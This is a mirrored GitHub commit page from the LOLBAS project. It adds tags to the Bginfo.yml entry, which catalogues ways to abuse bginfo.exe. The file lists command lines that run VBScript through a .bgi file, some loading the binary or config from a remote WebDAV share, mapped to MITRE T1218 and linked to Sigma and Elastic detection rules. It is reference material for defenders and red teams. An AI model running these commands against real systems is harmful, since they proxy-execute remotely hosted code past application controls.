public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Adding tags (closes #9, #318) (#362)

Browse Source 
* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze
2024-04-03 16:53:36 +01:00
committed by GitHub
parent a945bac6be
commit ebbf08ec4d
65 changed files with 229 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript
@@ -18,12 +20,16 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: Execute
Privileges: User
MitreID: T1218
Tags:
- Execute: WSH
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -39,6 +47,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -46,10 +56,10 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
Full_Path:
- Path: No fixed path
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml